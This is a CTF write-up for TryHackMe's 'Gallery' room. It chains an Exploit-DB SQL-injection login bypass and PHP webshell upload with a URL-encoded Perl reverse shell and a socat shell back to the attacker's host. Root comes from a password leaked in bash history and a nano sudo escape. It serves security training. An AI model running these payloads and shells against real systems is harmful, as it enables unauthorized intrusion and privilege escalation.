writeups

Gallery - Write-up - TryHackMe

noraj (Alexandre ZANNI)
, , , , , , , , ,
🇬🇧

Information

Room#

  • Name: Gallery
  • Profile: tryhackme.com
  • Difficulty: Easy
  • Description: Try to exploit our image gallery system

Gallery

Write-up

Overview#

Install tools used in this WU on BlackArch Linux:

1
$ sudo pacman -S nmap gtfoblookup exploitdb socat

Network Enumeration#

Services and ports scan with nmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# Nmap 7.92 scan initiated Sat Mar 19 17:36:17 2022 as: nmap -sSVC -p- -T4 -v -oA nmap_full 10.10.183.201
Nmap scan report for 10.10.183.201
Host is up (0.065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Simple Image Gallery System
|_http-favicon: Unknown favicon MD5: C1C16B6A8BE19F84F01DD24B3DF247BB

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 19 17:37:00 2022 -- 1 IP address (1 host up) scanned in 42.62 seconds

Web discovery#

The 8080 port http://10.10.183.201:8080 redirects to http://10.10.183.201/gallery/login.php.

It seems two exploits are available on EDB for this CMS:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ searchsploit Simple Image Gallery
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities                                      | php/webapps/49064.txt
Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross-Site Scripting                          | php/webapps/44104.txt
Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)                                                 | php/webapps/50214.py
Simple Image Gallery System 1.0 - 'id' SQL Injection                                                                     | php/webapps/50198.txt
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

$ searchsploit -p 50214
  Exploit: Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)
      URL: https://www.exploit-db.com/exploits/50214
     Path: /usr/share/exploitdb/exploits/php/webapps/50214.py
File Type: Python script, Unicode text, UTF-8 text executable, with very long lines (816)

Web exploitation#

The RCE exploit bypass authentication with an SQLi and then upload a PHP webshell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ python /usr/share/exploitdb/exploits/php/webapps/50214.py
TARGET = http://10.10.183.201/gallery
Login Bypass
shell name TagojufmdbvahfaiuxmLetta

protecting user

User ID : 1
Firsname : Adminstrator
Lasname : Admin
Username : admin

shell uploading
- OK -
Shell URL : http://10.10.183.201/gallery/uploads/1647711540_TagojufmdbvahfaiuxmLetta.php?cmd=whoami

We are under the www-data user.

To get the web app administrator password hash there are 2 options:

  1. Use the SQLi to dump the database
  2. Read the DB credentials from /var/www/html/gallery/initialize.php and then connect to the database once you have a reverse shell
1
2
3
4
5
6
7
8
9
10
11
<?php
  $dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');

  if(!defined('base_url')) define('base_url',"http://" . $_SERVER['SERVER_ADDR'] . "/gallery/");
  if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
  if(!defined('dev_data')) define('dev_data',$dev_data);
  if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
  if(!defined('DB_USERNAME')) define('DB_USERNAME',"gallery_user");
  if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"edited");
  if(!defined('DB_NAME')) define('DB_NAME',"gallery_db");
?>

Reverse shell#

I used the classic perl reverse shell form revshells.com, then url-encoded it.

1
2
3
4
5
6
7
8
9
10
GET /gallery/uploads/1647711540_TagojufmdbvahfaiuxmLetta.php?cmd=perl%20-e%20'use%20Socket%3b%24i%3d%2210.9.19.77%22%3b%24p%3d9999%3bsocket(S%2cPF_INET%2cSOCK_STREAM%2cgetprotobyname(%22tcp%22))%3bif(connect(S%2csockaddr_in(%24p%2cinet_aton(%24i))))%7bopen(STDIN%2c%22%3e%26S%22)%3bopen(STDOUT%2c%22%3e%26S%22)%3bopen(STDERR%2c%22%3e%26S%22)%3bexec(%22bash%20-i%22)%3b%7d%3b' HTTP/1.1
Host: 10.10.183.201
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=873lhffl0i57evbhb659ljj67q
Upgrade-Insecure-Requests: 1

And received it on my ncat listener:

1
2
3
4
5
6
7
8
9
10
$ ncat -lvnp 9999
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.10.183.201.
Ncat: Connection from 10.10.183.201:38198.
bash: cannot set terminal process group (708): Inappropriate ioctl for device
bash: no job control in this shell
www-data@gallery:/var/www/html/gallery/uploads$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

To interact with the DB we will need TTY allocation.

1
www-data@gallery:/var/www/html/gallery/uploads$ python3 -c 'import pty; pty.spawn("/bin/bash")'

Find app admin password hash#

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
$ mysql -u gallery_user -p
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| gallery_db         |
| information_schema |
+--------------------+
2 rows in set (0.00 sec)

MariaDB [(none)]> use gallery_db;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [gallery_db]> show tables;
+----------------------+
| Tables_in_gallery_db |
+----------------------+
| album_list           |
| images               |
| system_info          |
| users                |
+----------------------+
4 rows in set (0.00 sec)

MariaDB [gallery_db]> select * from users;
+----+--------------+----------+----------+----------------------------------+-------------------------------------------------+------------+------+---------------------+---------------------+
| id | firstname    | lastname | username | password                         | avatar                                          | last_login | type | date_added          | date_updated        |
+----+--------------+----------+----------+----------------------------------+-------------------------------------------------+------------+------+---------------------+---------------------+
|  1 | Adminstrator | Admin    | admin    | edited | uploads/1647711540_TagojufmdbvahfaiuxmLetta.php | NULL       |    1 | 2021-01-20 14:02:37 | 2022-03-19 17:39:13 |
+----+--------------+----------+----------+----------------------------------+-------------------------------------------------+------------+------+---------------------+---------------------+
1 row in set (0.00 sec)

Elevation of privilege (EoP): from www-data to mike#

There is a mike home directory backup that anyone can read.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
www-data@gallery:/$ ls -lhA /var/backups
total 52K
-rw-r--r-- 1 root root  34K Feb 12 21:40 apt.extended_states.0
-rw-r--r-- 1 root root 3.7K Aug 25  2021 apt.extended_states.1.gz
-rw-r--r-- 1 root root 3.5K May 21  2021 apt.extended_states.2.gz
-rw-r--r-- 1 root root 3.5K May 20  2021 apt.extended_states.3.gz
drwxr-xr-x 5 root root 4.0K May 24  2021 mike_home_backup

www-data@gallery:/var/backups/mike_home_backup$ ls -lhA
total 28K
-rwxr-xr-x 1 root root  135 May 24  2021 .bash_history
-rwxr-xr-x 1 root root  220 May 24  2021 .bash_logout
-rwxr-xr-x 1 root root 3.7K May 24  2021 .bashrc
drwxr-xr-x 3 root root 4.0K May 24  2021 .gnupg
-rwxr-xr-x 1 root root  807 May 24  2021 .profile
drwxr-xr-x 2 root root 4.0K May 24  2021 documents
drwxr-xr-x 2 root root 4.0K May 24  2021 images

$ www-data@gallery:/var/backups/mike_home_backup$ cat .bash_history
cat .bash_history
cd ~
ls
ping 1.1.1.1
cat /home/mike/user.txt
cd /var/www/
ls
cd html
ls -al
cat index.html
sudo -lb3stpassw0rdbr0xx
clear
sudo -l
exit

$ www-data@gallery:/var/backups/mike_home_backup$ su mike

mike@gallery:~$ cat user.txt
THM{edited}

Elevation of privilege (EoP): from mike to root#

Mike can run a script as root.

1
2
3
4
5
6
7
8
9
10
11
12
mike@gallery:~$ sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh

mike@gallery:~$ ls -lh /opt/rootkit.sh
-rw-r--r-- 1 root root 364 May 20  2021 /opt/rootkit.sh

mike@gallery:~$ cat /opt/rootkit.sh

/opt/rootkit.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck)
        /usr/bin/rkhunter --versioncheck ;;
    update)
        /usr/bin/rkhunter --update;;
    list)
        /usr/bin/rkhunter --list;;
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac

nano can be escaped to launch a shell so being able to execute nano as root means we can have a root shell.

1
2
3
4
5
6
7
8
$ gtfoblookup gtfobins search -c sudo  nano  
nano:

    sudo:

        Code: sudo nano
              ^R^X
              reset; sh 1>&0 2>&0

Let's do that. But even with a proper TTY allocated and TERM env var set correctly it won't work so we will have to use socat since ssh is not exposed.

1
2
3
4
5
# Host
socat file:`tty`,raw,echo=0 tcp-listen:8888

# Target
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.9.19.77:8888

This time the nano command input works properly.

1
2
3
4
5
6
7
mike@gallery:~$ sudo -u root /bin/bash /opt/rootkit.sh
Would you like to versioncheck, update, list or read the report ? read

# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
THM{edited}
Share